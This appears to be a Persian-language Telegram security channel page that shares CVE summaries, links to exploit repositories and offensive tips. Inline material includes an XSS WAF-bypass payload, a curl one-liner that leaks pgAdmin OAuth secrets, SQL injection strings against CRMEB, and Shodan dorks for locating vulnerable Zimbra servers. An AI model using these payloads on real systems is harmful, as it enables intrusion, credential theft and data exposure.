sn0whacks – Telegram
sn0whacks
1.43K subscribers
450 photos
14 videos
21 files
392 links
⚠️ Pentesting tips, Techniques, CTF WriteUps, News , Recent Exploits & POC's.

🎬 YouTube Channel: https://youtube.com/@sn0whacks
Download Telegram
معرفی ابزار Psobf.

ابزار Psobf برای Obfuscate کردن کد‌های پاورشل استفاده می‌شود. این ابزار با زبان Go نوشته شده و قابلیت Obfuscate کردن در 5 سطح مختلف را فراهم می‌کند. این ابزار حدود ۳ ماه قبل منتشر شده است.

لینک دانلود ابزار:
🔗https://github.com/TaurusOmar/psobf

@sn0whacks
#معرفی_ابزار
❤‍🔥4👍1
⚠️اکسپلویت آسیب‌پذیری بالابردن سطح دسترسی در HyperV.

⭕️آسیب‌پذیری با شماره CVE-2024-38080 از نوع Buffer Overflow بوده و به مهاجم Local با سطح دسترسی User امکان بالابردن سطح دسترسی به SYSTEM را می‌دهد.

⭕️درجه اهمیت: CVSS 7.8 High

اکسپلویت:
🔗https://github.com/pwndorei/CVE-2024-38080

@sn0whacks
#CVE_2024_38080 #hyperV #privEsc
👍2
معرفی ابزار ModTracer.

ابزار ModTracer تمامی RootKit‌های مخفی موجود در کرنل لینوکس را پیدا می‌کند.

لینک دانلود ابزار:
🔗https://github.com/MatheuZSecurity/ModTracer?tab=readme-ov-file

@sn0whacks
#معرفی_ابزار
❤‍🔥2👍1
📝به دست آوردن Credential با بررسی لاگ‌های ویندوز.

مقاله زیر درباره نحوه به دست آوردن User/pass کاربران دامین با بررسی لاگ‌های ویندوز با ابزار‌ها و روش‌های مختلف را نشان می‌دهد.

لینک مقاله:
🔗https://practicalsecurityanalytics.com/extracting-credentials-from-windows-logs/

@sn0whacks
#مقاله
👍5
📝نحوه انجام Enumeration بر روی سرویس SMB.

⭕️فرایند SMB Enumeration یکی از اقدامات کلیدی در تست نفوذ شبکه و Red Team می‌باشد. در مقاله زیر ابزار‌ها و نحوه انجام این فرایند به طور کلی بیان شده است.

لینک مقاله:
🔗https://0xdf.gitlab.io/2024/03/21/smb-cheat-sheet.html

@sn0whacks
#smb #cheatsheet #مقاله
👍2
⚠️دور زدن TCC Protection و دسترسی به اطلاعات حساس کاربر در Mac.

⭕️در آسیب‌پذیری با شماره CVE-2024-40801 با قابلیت container-migration.plist یک برنامه در Sandbox امکان Migrate فایل‌های ایمن شده TCC (مانند تاریخچه Safari، دیتابیس ایمیل، فایل‌های داکیومنت کاربر) به داخل Container خود نرم افزار را دارد. عملا با این کار فایل‌های ذکر شده برای مهاجم قابل دسترسی می‌باشد و مکانیزم TCC Protection دور می‌خورد.

لینک اکسپلویت:
🔗https://github.com/pvieito/ContainerMigrationExploit?tab=readme-ov-file

@sn0whacks
#CVE_2024_40801 #bypass #mac
👍4
📝چگونه در سال 2024 از ابزار Mimikatz استفاده کنیم؟

⭕️مقاله زیر به بررسی ابزار Mimikatz و نحوه اجرای سناریو‌های مختلف برای به دست آوردن رمز عبور کاربر و انجام Lateral Movement پرداخته است.

لینک مقاله:
🔗https://www.stationx.net/how-to-use-mimikatz/

@sn0whacks
#mimikatz #مقاله
👍3
⚠️بررسی آسیب‌پذیری 0day در مایکروسافت: به دست آوردن هش NTLMv2 به کمک فایل Office + اکسپلویت.

⭕️آسیب‌پذیری 0day در Microsoft Office با شماره CVE-2024-3800 مربوط به دریافت هش NTLMv2 از طریق ارسال فایل Office مخرب به سمت قربانی می‌باشد.

⭕️زمانی که فایل مخرب Office باز می‌شود یک درخواست با Office uri scheme به سمت مهاجم ارسال می‌شود. مهاجم امکان Redirect کردن این درخواست به سمت UNC Path حاوی آدرس آی‌پی Responder را دارد. مهاجم به کمک ابزار Responder امکان دریافت هش NTMLv2 کاربر را دارد.

اکسپلویت آسیب‌پذیری (دیروز منتشر شده است):
🔗https://github.com/passtheticket/CVE-2024-38200

@sn0whacks
#CVE_2024_3800 #exploit #poc #office #ntlmv2 #responder
👍6
⚠️بررسی آسیب‌پذیری RCE در سرویس CUPS در لینوکس + اکسپلویت.

⭕️سرویس CUPS یک سیستم پرینت در سیستم عامل لینوکس می‌باشد. این سرویس به صورت پیش‌فرض بر روی پورت 631 UDP کار می‌کند.

⭕️مهاجم می‌تواند یک PostScript Printer  Denoscription یا به طور خلاصه PPD حاوی کد مخرب بسازد. زمانی که PPD ساخته شده توسط CUPS فراخوانی شود کد مخرب اجرا می‌شود.

⭕️شماره CVE‌های ثبت شده برای آسیب‌پذیری:
CVE-2024-47076 (libcupsfilters), CVE-2024-47175 (libppd), CVE-2024-47176 (cups-browsed) and CVE-2024-47177 (cups-filters)

اکسپلویت آسیب‌پذیری (۱۱ ساعت قبل منتشر شده):
🔗https://github.com/RickdeJager/cupshax

@sn0whacks
#cups #rce #exploit #poc
🔥3👍2❤‍🔥1
🔥پیلود XSS برای دور زدن CloudFlare WAF:

‘>alert(154)</noscript><noscript/154=’;;;;;;;

@sn0whacks
#bugbountyTips
👍2
⚠️بررسی آسیب‌پذیری افشای اطلاعات حساس در pgAdmin + اکسپلویت.

⭕️آسیب‌پذیری با شماره CVE-2024-9014 به مهاجم امکان دریافت ClientID و مقدار Secret مربوط به oAuth کاربر را می‌دهد و منجر به افشای اطلاعات کاربر می‌شود.

اکسپلویت:
curl [URL_TO_TEST]/login?next=/ | grep -o '"oauth2Config": \[.*\]' | sed 's/"oauth2Config": //'

@sn0whacks
#CVE_2024_9014 #pgAdmin #exploit #poc
👍3
⚠️اکسپلویت آسیب‌پذیری RCE در Zimbra.

⭕️آسیب‌پذیری با شماره CVE-2024-45519 در سرویس postJournal وجود دارد که منجر به اجرای دستورات سیستمی به صورت unauthorized می‌شود.

🌐نحوه Dork در Shodan:
http.favicon.hash:1624375939

🌐نحوه Dork در Fofa:
app="Zimbra-Network-Client"

اکسپلویت پایتون (۱۸ ساعت قبل منتشر شده):
🔗https://github.com/p33d/CVE-2024-45519

@sn0whacks
#CVE_2024_45519 #zimbra #rce
👍8
🔵در تصویر فوق برخی ابزار‌های معروف در زمینه امنیت تدافعی قابل مشاهده می‌باشد.
@sn0whacks
#forensics
🔥3
⚠️اکسپلویت آسیب‌پذیری Harcoded Credential  در SolarWinds.

⭕️آسیب‌پذیری با شماره CVE-2024-28987 به دلیل وجود Hardcoded Credential در Solar Winds Web Help Desk (WHD) به وجود می‌آید.

⭕️این اطلاعات حساس که در ماژول OrionTicketController وجود دارد به مهاجم امکان دسترسی و تغییر و آپدیت اطلاعات بخش help desk ticket را دارد. اطلاعات این بخش شامل درخواست‌های تغییر رمز عبور کاربر می‌باشد.

🔺درجه اهمیت: CVSS 9.1 Critical

اکسپلویت پایتون:
🔗https://github.com/horizon3ai/CVE-2024-28987

@sn0whacks
#CVE_2024_28987 #solarWinds #exploit #poc
👍4
nmap.pdf
174.2 KB
📝فایل PDF موجود یک cheat sheet برای استفاده از ابزار nmap را نشان می‌دهد.

@sn0whacks
#pentesTips #nmap #cheatsheet
👍4
💉اکسپلویت آسیب‌پذیری sql Injection در CRMEB.

⭕️آسیب‌پذیری با شماره CVE-2024-36837 در تابع getProductList در فایل product Controller.php وجود دارد و به مهاجم امکان به دست آوردن اطلاعات حساس را می‌دهد.

⭕️درجه اهمیت: CVSS 7.5 High

⭕️نسخه آسیب‌پذیر: v.5.2.2

اکسپلویت:
 /api/products?limit=20&priceOrder&salesOrder&selectId=GTID_SUBSET(CONCAT(0x7e,(SELECT+(ELT(3550=3550,md5(9753165)))),0x7e),3550)

0-3661)%20OR%20MAKE_SET(8165=8165,7677)%20AND%20(4334=4334

@sn0whacks
#CVE_2024_36837 #sqli
👍6
📝نکات باگ‌بانتی.

با کمک ابزار subfinder و nuclie می‌توانید آسیب‌پذیری Subdomain Takeover را در تارگت خود پیدا کنید:

subfinder -d target -o target && nuclei -t wp-xyz-takeover[.]yaml -l target

@sn0whacks
#bugbountyTips
👍5
⚠️بررسی آسیب‌پذیری بالابردن سطح دسترسی در کرنل لینوکس + اکسپلویت.

⭕️آسیب‌پذیری با شماره CVE-2024-26808 در Netfilter Framework وجود دارد و زمانی رخ می‌دهد که Netfilter در مدیریت بسته‌های شبکه دچار خطا شده و منجر به دسترسی مهاجم به memory می‌شود.‌ در اکسپلویت آسیب‌پذیری فرایند cross cache Overwrite در memory انجام شده و منجر به دستکاری کرنل سیستم‌عامل می‌شود.

⭕️نسخه کرنل آسیب‌پذیر: v5.9 to v6.6

اکسپلویت:
🔗https://github.com/google/security-research/tree/master/pocs/linux/kernelctf/CVE-2024-26808_cos/exploit/cos-105-17412.294.36

@sn0whacks
#CVE_2024_26808 #exploit #poc
👍4🔥1
reversing-for-everyone.pdf
23.9 MB
#معرفی_کتاب

📚کتاب Reverse Engineering for everyone به طور مبتدی مباحث مربوط به مهندسی معکوس را شرح می‌دهد و همچنین معماری‌های مختلف را مورد بررسی قرار می‌دهد.

تعداد صفحات: 430.

@sn0whacks
👍5🔥1